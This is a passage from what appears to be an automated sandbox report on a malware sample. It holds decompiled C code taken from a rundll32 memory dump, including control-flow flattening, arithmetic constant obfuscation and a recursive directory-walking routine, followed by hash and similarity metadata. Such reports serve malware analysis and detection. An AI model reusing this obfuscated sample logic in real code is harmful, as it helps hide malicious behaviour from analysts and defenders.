                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _t406;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				signed int _t428;
                                                                                                                      				signed int _t429;
                                                                                                                      				signed int _t430;
                                                                                                                      				signed int _t435;
                                                                                                                      				void* _t467;
                                                                                                                      				void* _t468;
                                                                                                                      				signed int* _t472;
                                                                                                                      
                                                                                                                      				_t472 =  &_v2772;
                                                                                                                      				_v2700 = 0xd36ba7;
                                                                                                                      				_v2700 = _v2700 << 7;
                                                                                                                      				_v2700 = _v2700 ^ 0xaed70c65;
                                                                                                                      				_v2700 = _v2700 ^ 0xc762dfcc;
                                                                                                                      				_v2652 = 0x6f4609;
                                                                                                                      				_t9 =  &_v2652; // 0x6f4609
                                                                                                                      				_v2652 =  *_t9 * 0x1c;
                                                                                                                      				_t467 = __ecx;
                                                                                                                      				_v2652 = _v2652 ^ 0x0c23569d;
                                                                                                                      				_t468 = 0xea1969c;
                                                                                                                      				_v2608 = 0xb8394b;
                                                                                                                      				_v2608 = _v2608 + 0xaeb5;
                                                                                                                      				_v2608 = _v2608 ^ 0x00b390c3;
                                                                                                                      				_v2736 = 0x3d33f1;
                                                                                                                      				_v2736 = _v2736 + 0xffffd537;
                                                                                                                      				_v2736 = _v2736 + 0xffffb6ee;
                                                                                                                      				_v2736 = _v2736 + 0xbad8;
                                                                                                                      				_v2736 = _v2736 ^ 0x003e0409;
                                                                                                                      				_v2768 = 0xd1d4ce;
                                                                                                                      				_v2768 = _v2768 >> 0xc;
                                                                                                                      				_v2768 = _v2768 ^ 0xb5c37fe4;
                                                                                                                      				_v2768 = _v2768 + 0x4eb3;
                                                                                                                      				_v2768 = _v2768 ^ 0xb5c2c9c4;
                                                                                                                      				_v2760 = 0x157bbd;
                                                                                                                      				_v2760 = _v2760 ^ 0x6d7617e7;
                                                                                                                      				_v2760 = _v2760 ^ 0x1b56cd2f;
                                                                                                                      				_v2760 = _v2760 ^ 0xfb63426d;
                                                                                                                      				_v2760 = _v2760 ^ 0x8d577604;
                                                                                                                      				_v2604 = 0x1fac8b;
                                                                                                                      				_v2604 = _v2604 + 0x9962;
                                                                                                                      				_v2604 = _v2604 ^ 0x0029d956;
                                                                                                                      				_v2696 = 0x3d46b4;
                                                                                                                      				_v2696 = _v2696 | 0x3d7fd3ff;
                                                                                                                      				_v2696 = _v2696 ^ 0x3d7bd02d;
                                                                                                                      				_v2720 = 0xad1695;
                                                                                                                      				_t426 = 9;
                                                                                                                      				_v2720 = _v2720 * 0x4b;
                                                                                                                      				_v2720 = _v2720 >> 0x10;
                                                                                                                      				_v2720 = _v2720 << 0xe;
                                                                                                                      				_v2720 = _v2720 ^ 0x0cab1f79;
                                                                                                                      				_v2644 = 0xe14118;
                                                                                                                      				_v2644 = _v2644 ^ 0x82369820;
                                                                                                                      				_v2644 = _v2644 ^ 0x82de8a4e;
                                                                                                                      				_v2668 = 0x391c30;
                                                                                                                      				_v2668 = _v2668 >> 7;
                                                                                                                      				_v2668 = _v2668 + 0xffff3589;
                                                                                                                      				_v2668 = _v2668 ^ 0xfff6d862;
                                                                                                                      				_v2692 = 0x9dbc3;
                                                                                                                      				_v2692 = _v2692 << 8;
                                                                                                                      				_v2692 = _v2692 * 0x75;
                                                                                                                      				_v2692 = _v2692 ^ 0x81749ad9;
                                                                                                                      				_v2660 = 0x144a46;
                                                                                                                      				_v2660 = _v2660 >> 0xd;
                                                                                                                      				_v2660 = _v2660 ^ 0x0008b8c7;
                                                                                                                      				_v2752 = 0x703c03;
                                                                                                                      				_v2752 = _v2752 * 0x74;
                                                                                                                      				_v2752 = _v2752 ^ 0x2e54cb21;
                                                                                                                      				_v2752 = _v2752 | 0x6f17e683;
                                                                                                                      				_v2752 = _v2752 ^ 0x7f96e2f0;
                                                                                                                      				_v2676 = 0xa438e5;
                                                                                                                      				_v2676 = _v2676 / _t426;
                                                                                                                      				_v2676 = _v2676 + 0x92ff;
                                                                                                                      				_v2676 = _v2676 ^ 0x0015b827;
                                                                                                                      				_v2612 = 0x1c48b9;
                                                                                                                      				_t427 = 0x1a;
                                                                                                                      				_v2612 = _v2612 / _t427;
                                                                                                                      				_v2612 = _v2612 ^ 0x000154fb;
                                                                                                                      				_v2628 = 0x490198;
                                                                                                                      				_v2628 = _v2628 | 0x561f6486;
                                                                                                                      				_v2628 = _v2628 ^ 0x565ec1b9;
                                                                                                                      				_v2616 = 0xcec4ed;
                                                                                                                      				_t428 = 0x3d;
                                                                                                                      				_v2616 = _v2616 * 9;
                                                                                                                      				_v2616 = _v2616 ^ 0x074f393e;
                                                                                                                      				_v2636 = 0x4be85b;
                                                                                                                      				_v2636 = _v2636 >> 1;
                                                                                                                      				_v2636 = _v2636 ^ 0x002afd34;
                                                                                                                      				_v2728 = 0xca47ed;
                                                                                                                      				_v2728 = _v2728 << 1;
                                                                                                                      				_v2728 = _v2728 / _t428;
                                                                                                                      				_v2728 = _v2728 >> 3;
                                                                                                                      				_v2728 = _v2728 ^ 0x00084593;
                                                                                                                      				_v2620 = 0x793301;
                                                                                                                      				_v2620 = _v2620 | 0xccc0d5da;
                                                                                                                      				_v2620 = _v2620 ^ 0xccf56683;
                                                                                                                      				_v2684 = 0xd6c9e7;
                                                                                                                      				_v2684 = _v2684 >> 8;
                                                                                                                      				_v2684 = _v2684 + 0x30fc;
                                                                                                                      				_v2684 = _v2684 ^ 0x000dbf27;
                                                                                                                      				_v2656 = 0x6cf887;
                                                                                                                      				_v2656 = _v2656 | 0x54469415;
                                                                                                                      				_v2656 = _v2656 ^ 0x5469dd96;
                                                                                                                      				_v2712 = 0x1ba43e;
                                                                                                                      				_v2712 = _v2712 + 0xffff54b6;
                                                                                                                      				_v2712 = _v2712 >> 0x10;
                                                                                                                      				_v2712 = _v2712 ^ 0x536d0b9d;
                                                                                                                      				_v2712 = _v2712 ^ 0x5368fd88;
                                                                                                                      				_v2744 = 0x7fa81e;
                                                                                                                      				_v2744 = _v2744 + 0x45dd;
                                                                                                                      				_v2744 = _v2744 | 0xcc5c3b14;
                                                                                                                      				_t429 = 0x76;
                                                                                                                      				_v2744 = _v2744 * 0x48;
                                                                                                                      				_v2744 = _v2744 ^ 0x83f6fb81;
                                                                                                                      				_v2704 = 0x73cce1;
                                                                                                                      				_v2704 = _v2704 >> 6;
                                                                                                                      				_v2704 = _v2704 | 0x0e0742c3;
                                                                                                                      				_v2704 = _v2704 ^ 0x0e0521c8;
                                                                                                                      				_v2764 = 0x3737a7;
                                                                                                                      				_v2764 = _v2764 >> 0xb;
                                                                                                                      				_v2764 = _v2764 << 3;
                                                                                                                      				_v2764 = _v2764 + 0x14ac;
                                                                                                                      				_v2764 = _v2764 ^ 0x0004654a;
                                                                                                                      				_v2772 = 0xaeb57f;
                                                                                                                      				_v2772 = _v2772 / _t429;
                                                                                                                      				_v2772 = _v2772 << 0xf;
                                                                                                                      				_t430 = 0x37;
                                                                                                                      				_v2772 = _v2772 / _t430;
                                                                                                                      				_v2772 = _v2772 ^ 0x037ee988;
                                                                                                                      				_v2648 = 0x954498;
                                                                                                                      				_t431 = 0x4b;
                                                                                                                      				_v2648 = _v2648 / _t431;
                                                                                                                      				_v2648 = _v2648 ^ 0x00054dec;
                                                                                                                      				_v2640 = 0x8be41e;
                                                                                                                      				_v2640 = _v2640 >> 0xd;
                                                                                                                      				_v2640 = _v2640 ^ 0x00089615;
                                                                                                                      				_v2748 = 0xfabe1b;
                                                                                                                      				_v2748 = _v2748 ^ 0xff42a680;
                                                                                                                      				_v2748 = _v2748 + 0xffff8ee7;
                                                                                                                      				_v2748 = _v2748 + 0x1c5a;
                                                                                                                      				_v2748 = _v2748 ^ 0xffbaa703;
                                                                                                                      				_v2756 = 0x33a01d;
                                                                                                                      				_v2756 = _v2756 * 0x6f;
                                                                                                                      				_v2756 = _v2756 << 4;
                                                                                                                      				_v2756 = _v2756 >> 4;
                                                                                                                      				_v2756 = _v2756 ^ 0x066d94da;
                                                                                                                      				_v2672 = 0x7cb69f;
                                                                                                                      				_v2672 = _v2672 << 4;
                                                                                                                      				_v2672 = _v2672 * 0x4a;
                                                                                                                      				_v2672 = _v2672 ^ 0x40c5c2d0;
                                                                                                                      				_v2680 = 0xc0e1f8;
                                                                                                                      				_v2680 = _v2680 << 1;
                                                                                                                      				_v2680 = _v2680 | 0xa5ca1830;
                                                                                                                      				_v2680 = _v2680 ^ 0xa5ca6401;
                                                                                                                      				_v2732 = 0xd52773;
                                                                                                                      				_v2732 = _v2732 ^ 0x8b84e9f5;
                                                                                                                      				_v2732 = _v2732 + 0xffffa58a;
                                                                                                                      				_v2732 = _v2732 >> 1;
                                                                                                                      				_v2732 = _v2732 ^ 0x45a69f9f;
                                                                                                                      				_v2740 = 0x525c84;
                                                                                                                      				_v2740 = _v2740 * 0x45;
                                                                                                                      				_v2740 = _v2740 << 0xd;
                                                                                                                      				_v2740 = _v2740 + 0xffffe485;
                                                                                                                      				_v2740 = _v2740 ^ 0x5df42895;
                                                                                                                      				_v2688 = 0x8afd1b;
                                                                                                                      				_v2688 = _v2688 >> 0xa;
                                                                                                                      				_v2688 = _v2688 * 0x44;
                                                                                                                      				_v2688 = _v2688 ^ 0x000c822b;
                                                                                                                      				_v2632 = 0xb6ec99;
                                                                                                                      				_v2632 = _v2632 + 0xffff2a9a;
                                                                                                                      				_v2632 = _v2632 ^ 0x00b1db1a;
                                                                                                                      				_v2664 = 0xfa37e2;
                                                                                                                      				_v2664 = _v2664 * 0x4c;
                                                                                                                      				_v2664 = _v2664 + 0x9251;
                                                                                                                      				_v2664 = _v2664 ^ 0x4a4e0c53;
                                                                                                                      				_v2708 = 0xf9311d;
                                                                                                                      				_v2708 = _v2708 >> 2;
                                                                                                                      				_t406 = _v2708 * 0x30;
                                                                                                                      				_v2708 = _t406;
                                                                                                                      				_v2708 = _v2708 + 0xffffde46;
                                                                                                                      				_v2708 = _v2708 ^ 0x0bad021b;
                                                                                                                      				_v2624 = 0x51d14;
                                                                                                                      				_v2624 = _v2624 | 0x271919e8;
                                                                                                                      				_v2624 = _v2624 ^ 0x2716653c;
                                                                                                                      				_v2716 = 0x708eea;
                                                                                                                      				_v2716 = _v2716 + 0xfffff8d8;
                                                                                                                      				_v2716 = _v2716 | 0x4ca3cf3c;
                                                                                                                      				_v2716 = _v2716 ^ 0x396f5f4d;
                                                                                                                      				_v2716 = _v2716 ^ 0x7599e4cd;
                                                                                                                      				_v2724 = 0x3acc77;
                                                                                                                      				_v2724 = _v2724 + 0x56d;
                                                                                                                      				_v2724 = _v2724 + 0xb0bb;
                                                                                                                      				_v2724 = _v2724 + 0xffffce89;
                                                                                                                      				_v2724 = _v2724 ^ 0x003c4612;
                                                                                                                      				while(_t468 != 0x5de06da) {
                                                                                                                      					if(_t468 == 0xea1969c) {
                                                                                                                      						_t468 = 0xfa9128f;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t480 = _t468 - 0xfa9128f;
                                                                                                                      						if(_t468 != 0xfa9128f) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t468 - 0xa8e801c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E0069DA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
                                                                                                                      							 *((short*)(E0068B6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
                                                                                                                      							E00688969(_v2720,  &_v1560, _t480, _v2644, _v2668);
                                                                                                                      							_push(_v2752);
                                                                                                                      							_push(_v2660);
                                                                                                                      							E006847CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E0069DCF7(_v2692, 0x681308, _t480),  &_v1560, _v2616, _v2636);
                                                                                                                      							E0068A8B0(_v2728, _t419, _v2620);
                                                                                                                      							_t431 = _v2684;
                                                                                                                      							_t406 = E0068EA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
                                                                                                                      							_t472 =  &(_t472[0x17]);
                                                                                                                      							if(_t406 != 0) {
                                                                                                                      								_t468 = 0x5de06da;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t406;
                                                                                                                      				}
                                                                                                                      				_push(_v2648);
                                                                                                                      				_push(_v2700);
                                                                                                                      				_push(_v2772);
                                                                                                                      				_push( &_v1040);
                                                                                                                      				E006946BB(_v2704, _v2764);
                                                                                                                      				_push(_v2756);
                                                                                                                      				_push(_v2748);
                                                                                                                      				E006847CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E0069DCF7(_v2640, 0x6813b8, __eflags),  &_v2080, _v2740, _v2688);
                                                                                                                      				_t435 = _v2632;
                                                                                                                      				E0068A8B0(_t435, _t409, _v2664);
                                                                                                                      				__eflags = 0;
                                                                                                                      				_push(_v2724);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_t435);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v2716);
                                                                                                                      				_t431 = _v2708;
                                                                                                                      				_push( &_v520);
                                                                                                                      				_t406 = E0068AB87(_v2708, _v2624, 0);
                                                                                                                      				_t472 = _t472 - 0xc + 0x64;
                                                                                                                      				_t468 = 0xa8e801c;
                                                                                                                      				goto L8;
                                                                                                                      			}
                                                                                                                      0x006911f5
                                                                                                                      0x006911fd
                                                                                                                      0x00691205
                                                                                                                      0x00691215
                                                                                                                      0x00691219
                                                                                                                      0x00691222
                                                                                                                      0x00691227
                                                                                                                      0x0069122d
                                                                                                                      0x00691235
                                                                                                                      0x00691247
                                                                                                                      0x0069124a
                                                                                                                      0x00691251
                                                                                                                      0x0069125c
                                                                                                                      0x00691267
                                                                                                                      0x0069126f
                                                                                                                      0x0069127a
                                                                                                                      0x00691282
                                                                                                                      0x0069128a
                                                                                                                      0x00691292
                                                                                                                      0x0069129a
                                                                                                                      0x006912a7
                                                                                                                      0x006912b9
                                                                                                                      0x006912bd
                                                                                                                      0x006912c2
                                                                                                                      0x006912c7
                                                                                                                      0x006912cf
                                                                                                                      0x006912d7
                                                                                                                      0x006912e1
                                                                                                                      0x006912e5
                                                                                                                      0x006912ed
                                                                                                                      0x006912f5
                                                                                                                      0x006912f9
                                                                                                                      0x00691301
                                                                                                                      0x00691309
                                                                                                                      0x00691311
                                                                                                                      0x00691319
                                                                                                                      0x00691321
                                                                                                                      0x00691325
                                                                                                                      0x0069132d
                                                                                                                      0x0069133a
                                                                                                                      0x0069133e
                                                                                                                      0x00691343
                                                                                                                      0x0069134b
                                                                                                                      0x00691353
                                                                                                                      0x0069135b
                                                                                                                      0x00691365
                                                                                                                      0x00691369
                                                                                                                      0x00691371
                                                                                                                      0x0069137c
                                                                                                                      0x00691387
                                                                                                                      0x00691392
                                                                                                                      0x0069139f
                                                                                                                      0x006913a3
                                                                                                                      0x006913ab
                                                                                                                      0x006913b3
                                                                                                                      0x006913bb
                                                                                                                      0x006913c0
                                                                                                                      0x006913c5
                                                                                                                      0x006913c9
                                                                                                                      0x006913d1
                                                                                                                      0x006913d9
                                                                                                                      0x006913e4
                                                                                                                      0x006913ef
                                                                                                                      0x006913fa
                                                                                                                      0x00691402
                                                                                                                      0x0069140a
                                                                                                                      0x00691412
                                                                                                                      0x0069141a
                                                                                                                      0x00691422
                                                                                                                      0x0069142a
                                                                                                                      0x00691432
                                                                                                                      0x0069143a
                                                                                                                      0x00691442
                                                                                                                      0x0069144a
                                                                                                                      0x00691458
                                                                                                                      0x00691572
                                                                                                                      0x00000000
                                                                                                                      0x0069145e
                                                                                                                      0x0069145e
                                                                                                                      0x00691460
                                                                                                                      0x0069163b
                                                                                                                      0x0069163b
                                                                                                                      0x00691641
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00691466
                                                                                                                      0x00691485
                                                                                                                      0x006914bc
                                                                                                                      0x006914c3
                                                                                                                      0x006914c8
                                                                                                                      0x006914d1
                                                                                                                      0x00691524
                                                                                                                      0x00691536
                                                                                                                      0x00691554
                                                                                                                      0x0069155b
                                                                                                                      0x00691560
                                                                                                                      0x00691565
                                                                                                                      0x0069156b
                                                                                                                      0x00000000
                                                                                                                      0x0069156b
                                                                                                                      0x00691565
                                                                                                                      0x00691460
                                                                                                                      0x00691651
                                                                                                                      0x00691651
                                                                                                                      0x00691579
                                                                                                                      0x00691587
                                                                                                                      0x0069158b
                                                                                                                      0x0069159a
                                                                                                                      0x0069159b
                                                                                                                      0x006915a0
                                                                                                                      0x006915a9
                                                                                                                      0x006915f0
                                                                                                                      0x006915fc
                                                                                                                      0x00691605
                                                                                                                      0x0069160d
                                                                                                                      0x0069160f
                                                                                                                      0x00691613
                                                                                                                      0x00691614
                                                                                                                      0x00691615
                                                                                                                      0x00691616
                                                                                                                      0x00691617
                                                                                                                      0x00691629
                                                                                                                      0x0069162d
                                                                                                                      0x0069162e
                                                                                                                      0x00691633
                                                                                                                      0x00691636
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fo$M_o9$[K
                                                                                                                      • API String ID: 0-3743190696
                                                                                                                      • Opcode ID: 59ccfd4b88bafa1448f3e74d2f5b446880fbc73a78ed17dd742be059d1b6315f
                                                                                                                      • Instruction ID: 490d8806b87517924f78af0317fc1c53140179da54b5f5f43440c5edec9b7b1d
                                                                                                                      • Opcode Fuzzy Hash: 59ccfd4b88bafa1448f3e74d2f5b446880fbc73a78ed17dd742be059d1b6315f
                                                                                                                      • Instruction Fuzzy Hash: 211201B1409381CFD3A8CF21C58AA9BBBF2FBC5748F10891DE59996260D7B18909CF57
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E00689DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				intOrPtr _v136;
                                                                                                                      				char _v160;
                                                                                                                      				short _v708;
                                                                                                                      				short _v710;
                                                                                                                      				char _v712;
                                                                                                                      				signed int _v756;
                                                                                                                      				char _v1276;
                                                                                                                      				char _v1796;
                                                                                                                      				void* _t278;
                                                                                                                      				signed int _t306;
                                                                                                                      				signed int _t310;
                                                                                                                      				void* _t312;
                                                                                                                      				intOrPtr _t317;
                                                                                                                      				void* _t319;
                                                                                                                      				signed int _t324;
                                                                                                                      				void* _t327;
                                                                                                                      				void* _t353;
                                                                                                                      				signed int _t365;
                                                                                                                      				signed int _t366;
                                                                                                                      				signed int _t367;
                                                                                                                      				signed int _t368;
                                                                                                                      				signed int _t369;
                                                                                                                      				signed int _t370;
                                                                                                                      				void* _t373;
                                                                                                                      				void* _t374;
                                                                                                                      
                                                                                                                      				_t317 = _a12;
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_t317);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t278);
                                                                                                                      				_v44 = 0x411c30;
                                                                                                                      				_t374 = _t373 + 0x20;
                                                                                                                      				_v44 = _v44 ^ 0x3aebcc2b;
                                                                                                                      				_v44 = _v44 ^ 0x10090153;
                                                                                                                      				_t319 = 0x338c922;
                                                                                                                      				_v44 = _v44 ^ 0x2aa3d158;
                                                                                                                      				_v56 = 0xa7c140;
                                                                                                                      				_v56 = _v56 >> 1;
                                                                                                                      				_v56 = _v56 ^ 0xbf613798;
                                                                                                                      				_v56 = _v56 ^ 0xbf3c535c;
                                                                                                                      				_v88 = 0xb7ebf9;
                                                                                                                      				_t365 = 0x52;
                                                                                                                      				_v88 = _v88 / _t365;
                                                                                                                      				_v88 = _v88 ^ 0x0004e01e;
                                                                                                                      				_v112 = 0x1a3e5b;
                                                                                                                      				_v112 = _v112 + 0xd588;
                                                                                                                      				_v112 = _v112 ^ 0x0012c9bc;
                                                                                                                      				_v8 = 0x55b84a;
                                                                                                                      				_t366 = 0x72;
                                                                                                                      				_v8 = _v8 * 0x74;
                                                                                                                      				_v8 = _v8 + 0xffff07de;
                                                                                                                      				_v8 = _v8 * 0x41;
                                                                                                                      				_v8 = _v8 ^ 0xdc74eedb;
                                                                                                                      				_v96 = 0x123c4e;
                                                                                                                      				_v96 = _v96 + 0x1d06;
                                                                                                                      				_v96 = _v96 ^ 0x001f978b;
                                                                                                                      				_v124 = 0x58f8d3;
                                                                                                                      				_v124 = _v124 * 0x2b;
                                                                                                                      				_v124 = _v124 ^ 0x0efbe47e;
                                                                                                                      				_v120 = 0x58d481;
                                                                                                                      				_v120 = _v120 << 5;
                                                                                                                      				_v120 = _v120 ^ 0x0b1fdd63;
                                                                                                                      				_v32 = 0x85548e;
                                                                                                                      				_v32 = _v32 / _t366;
                                                                                                                      				_v32 = _v32 * 0x2e;
                                                                                                                      				_v32 = _v32 ^ 0x0037cfdf;
                                                                                                                      				_v108 = 0x851b7a;
                                                                                                                      				_v108 = _v108 | 0xf3ff5f40;
                                                                                                                      				_v108 = _v108 ^ 0xf3fc1521;
                                                                                                                      				_v76 = 0x86d28f;
                                                                                                                      				_v76 = _v76 >> 0xd;
                                                                                                                      				_v76 = _v76 ^ 0x000a85f2;
                                                                                                                      				_v48 = 0x8a8988;
                                                                                                                      				_v48 = _v48 + 0xffff9d54;
                                                                                                                      				_v48 = _v48 + 0xffffb441;
                                                                                                                      				_v48 = _v48 ^ 0x008c2bbe;
                                                                                                                      				_v80 = 0x3fe2a4;
                                                                                                                      				_v80 = _v80 ^ 0x5e00b743;
                                                                                                                      				_v80 = _v80 ^ 0x5e39b1b0;
                                                                                                                      				_v116 = 0x4ea08b;
                                                                                                                      				_v116 = _v116 + 0xffffca32;
                                                                                                                      				_v116 = _v116 ^ 0x00427ef9;
                                                                                                                      				_v104 = 0xba6181;
                                                                                                                      				_v104 = _v104 + 0xf529;
                                                                                                                      				_v104 = _v104 ^ 0x00b33727;
                                                                                                                      				_v52 = 0x1e8210;
                                                                                                                      				_v52 = _v52 >> 8;
                                                                                                                      				_v52 = _v52 | 0xffb97487;
                                                                                                                      				_v52 = _v52 ^ 0xffb16a42;
                                                                                                                      				_v40 = 0xeabfd3;
                                                                                                                      				_v40 = _v40 ^ 0x26644279;
                                                                                                                      				_t367 = 0x3a;
                                                                                                                      				_v40 = _v40 / _t367;
                                                                                                                      				_v40 = _v40 ^ 0x00a36ea5;
                                                                                                                      				_v12 = 0xc9f67b;
                                                                                                                      				_v12 = _v12 + 0x836b;
                                                                                                                      				_v12 = _v12 | 0xa1408986;
                                                                                                                      				_t368 = 0x45;
                                                                                                                      				_v12 = _v12 * 0x75;
                                                                                                                      				_v12 = _v12 ^ 0xf1cc1c9a;
                                                                                                                      				_v36 = 0x1f6921;
                                                                                                                      				_v36 = _v36 ^ 0x9bf749ed;
                                                                                                                      				_v36 = _v36 / _t368;
                                                                                                                      				_v36 = _v36 ^ 0x024ed910;
                                                                                                                      				_v64 = 0x37ccf2;
                                                                                                                      				_v64 = _v64 + 0xfffff775;
                                                                                                                      				_t369 = 0x19;
                                                                                                                      				_v64 = _v64 * 0x24;
                                                                                                                      				_v64 = _v64 ^ 0x07d7b77b;
                                                                                                                      				_v28 = 0x370f8;
                                                                                                                      				_v28 = _v28 << 0xd;
                                                                                                                      				_v28 = _v28 + 0x6470;
                                                                                                                      				_v28 = _v28 >> 1;
                                                                                                                      				_v28 = _v28 ^ 0x37097055;
                                                                                                                      				_v20 = 0x84152c;
                                                                                                                      				_v20 = _v20 * 0x7e;
                                                                                                                      				_v20 = _v20 / _t369;
                                                                                                                      				_v20 = _v20 << 0xe;
                                                                                                                      				_v20 = _v20 ^ 0x6c90d6a3;
                                                                                                                      				_v60 = 0x687dd9;
                                                                                                                      				_t370 = 0xc;
                                                                                                                      				_v60 = _v60 * 0x1d;
                                                                                                                      				_v60 = _v60 << 7;
                                                                                                                      				_v60 = _v60 ^ 0xeb212648;
                                                                                                                      				_v84 = 0xd09924;
                                                                                                                      				_v84 = _v84 * 0x7c;
                                                                                                                      				_v84 = _v84 ^ 0x650614c5;
                                                                                                                      				_v100 = 0x3804f2;
                                                                                                                      				_v100 = _v100 | 0x9eb8052c;
                                                                                                                      				_v100 = _v100 ^ 0x9eb506d7;
                                                                                                                      				_v92 = 0xf492b0;
                                                                                                                      				_v92 = _v92 + 0xffffc4ae;
                                                                                                                      				_v92 = _v92 ^ 0x00fafa5e;
                                                                                                                      				_v16 = 0xd0e41e;
                                                                                                                      				_v16 = _v16 * 0x3d;
                                                                                                                      				_v16 = _v16 >> 0xd;
                                                                                                                      				_v16 = _v16 >> 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x000dc1c9;
                                                                                                                      				_v24 = 0x66d2fe;
                                                                                                                      				_v24 = _v24 / _t370;
                                                                                                                      				_v24 = _v24 + 0xffffccd2;
                                                                                                                      				_v24 = _v24 ^ 0x0a93dd72;
                                                                                                                      				_v24 = _v24 ^ 0x0a9c564f;
                                                                                                                      				_v72 = 0xbcf4e;
                                                                                                                      				_v72 = _v72 >> 7;
                                                                                                                      				_v72 = _v72 ^ 0x000c8ddf;
                                                                                                                      				_t364 = _v72;
                                                                                                                      				_v68 = 0x4616df;
                                                                                                                      				_v68 = _v68 + 0x9c8e;
                                                                                                                      				_v68 = _v68 + 0xaaef;
                                                                                                                      				_v68 = _v68 ^ 0x004c065d;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t353 = 0x2e;
                                                                                                                      					L2:
                                                                                                                      					while(_t319 != 0x21229d9) {
                                                                                                                      						if(_t319 == 0x338c922) {
                                                                                                                      							_v136 = _t317;
                                                                                                                      							_t319 = 0x9035918;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t319 == 0x5b964d8) {
                                                                                                                      							__eflags = _v756 & _v44;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t306 = _a16( &_v756,  &_v160);
                                                                                                                      								asm("sbb ecx, ecx");
                                                                                                                      								_t324 =  ~_t306 & 0x09c7cc54;
                                                                                                                      								L9:
                                                                                                                      								_t319 = _t324 + 0x21229d9;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t353 = 0x2e;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							__eflags = _v712 - _t353;
                                                                                                                      							if(_v712 != _t353) {
                                                                                                                      								L19:
                                                                                                                      								__eflags = _a24;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_push(_v104);
                                                                                                                      									_push(_v116);
                                                                                                                      									_t312 = E0069DCF7(_v80, 0x6817a0, __eflags);
                                                                                                                      									_pop(_t327);
                                                                                                                      									E006847CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
                                                                                                                      									E00689DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
                                                                                                                      									_t310 = E0068A8B0(_v100, _t312, _v92);
                                                                                                                      									_t374 = _t374 + 0x3c;
                                                                                                                      									_t353 = 0x2e;
                                                                                                                      								}
                                                                                                                      								L18:
                                                                                                                      								_t319 = 0xbd9f62d;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _v710;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								goto L18;
                                                                                                                      							}
                                                                                                                      							__eflags = _v710 - _t353;
                                                                                                                      							if(_v710 != _t353) {
                                                                                                                      								goto L19;
                                                                                                                      							}
                                                                                                                      							__eflags = _v708;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L19;
                                                                                                                      							}
                                                                                                                      							goto L18;
                                                                                                                      						}
                                                                                                                      						if(_t319 == 0x9035918) {
                                                                                                                      							_push(_v112);
                                                                                                                      							_push(_v88);
                                                                                                                      							E0068A918(_t317, __eflags, _v8, _v96, E0069DCF7(_v56, 0x681770, __eflags), _v124,  &_v1796);
                                                                                                                      							_t374 = _t374 + 0x1c;
